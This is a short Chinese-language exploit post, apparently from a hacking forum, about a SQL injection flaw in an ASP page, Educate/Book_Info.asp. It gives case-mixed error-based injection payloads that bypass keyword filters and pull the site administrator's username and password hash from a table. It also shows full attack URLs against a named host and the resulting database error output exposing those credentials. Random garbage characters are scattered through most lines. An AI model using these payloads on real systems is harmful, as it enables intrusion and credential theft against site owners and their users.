漏洞出现在Educate/Book_Info.asp7 W9 I- X0 d9 X9 h4 K
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
* c( U/ b2 i7 T4 j+ i+ aexp:如下
+ D( A& O& j$ X6 [" B7 j# [查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)$ U& }* e8 b. y) R8 k3 X e
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper), l3 d- ? c" t( G+ j7 H; r
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
$ w [5 D, a7 E% TMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
' V1 z2 ~/ L8 o0 p将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
& _# ~2 x% {0 |5 V" a, }8 [% B0 ~/Educate/Book_Info.asp,行 8
2 `: E7 ?* ~% M1 a" M- qhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
/ a+ E' y$ ]" P! J' gMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'* a! W4 K3 z! E% Q1 O
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。 h* ]' }1 U# Z t" L6 U& u
/Educate/Book_Info.asp,行 8 |